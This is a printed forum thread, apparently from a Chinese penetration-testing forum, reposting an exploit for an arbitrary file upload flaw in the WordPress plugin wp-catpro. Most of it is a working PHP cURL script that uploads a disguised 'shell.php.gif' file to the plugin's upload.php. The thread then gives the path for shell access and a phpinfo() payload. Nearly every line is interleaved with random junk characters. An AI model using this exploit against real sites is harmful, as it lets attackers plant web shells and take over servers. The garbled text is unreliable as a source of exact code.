中国网络渗透测试联盟

标题: WordPress插件wp-catpro任意文件上传 [打印本页]

作者: admin    时间: 2013-2-27 20:12
标题: WordPress插件wp-catpro任意文件上传
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
1 c( F9 o) d4 z! y#-----------------------------------------------------------------------( M% J$ X- E- E  P5 B" C
+ e. e. n6 P5 A( F
作者  => Zikou-16. p8 `1 D9 c% V2 t% h0 X
邮箱 => zikou16x@gmail.com
, G  G- h2 [! K: A+ j, n测试系统 : Windows 7 , Backtrack 5r38 ?7 H! X/ {  S8 t# p/ V
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
5 K- b! B2 |2 E; I####, I/ \( ^2 Q( x6 q6 i3 i% T$ a( @
6 w6 J2 Z; q( m. ]+ Q) N2 ^5 \' d
#=> Exploit 信息:, f, G/ h9 r/ Q% O  h( [
------------------
, F9 q8 D! ]4 b2 C& X3 e# 攻击者可以上传 file/shell.php.gif- N8 s/ {  T& z2 N
# ("jpg", "gif", "png")  // Allowed file extensions
& n' |" P8 S3 J8 E% v; E# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)+ k/ V( a* y" \5 s& p
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
0 \  G4 R" n" Y------------------, |1 \2 U  o2 q# R% w
; H1 Y  d" ~$ t  l! B6 O
#=> Exploit3 c) B3 R: H: y8 \5 B
-----------
: _' h9 {. D# u( b) x1 _<?php
" H2 ~% X: i# \& x% @5 l  P: ^
/ m4 R4 r4 `; X3 D% u$uploadfile="zik.php.gif";
/ ^/ [$ h* `0 ]7 @3 D6 X$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
" V) Z0 x* z3 A$ F" d) a; hcurl_setopt($ch, CURLOPT_POST, true);
* m, w; k% M5 B, ecurl_setopt($ch, CURLOPT_POSTFIELDS,
  z. K4 c9 L: U8 i! k" karray('Filedata'=>"@$uploadfile",
! a/ h) C9 R& J" m" n/ M) r& w'folder'=>'/wp-content/uploads/catpro/'));
, x- r5 U' B- Ecurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
; D# z0 E% ]% A8 O6 }$postResult = curl_exec($ch);0 ?+ D) `& t8 ?) I3 _
curl_close($ch);9 H/ a6 ]& ]' Y) j# ~  @0 e
/ O2 H6 F, o  J$ k
print "$postResult";# l. t$ {. o0 e! b/ _

0 L  k( ?" j' {7 zShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
" Q+ z7 R5 Y- K7 K, r4 n  ?>
5 U! X' I" h2 v2 N/ K  M+ d<?php( t) v; g% Y; Q
phpinfo();( a" M2 Q; `' N4 K0 L0 c
?>




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2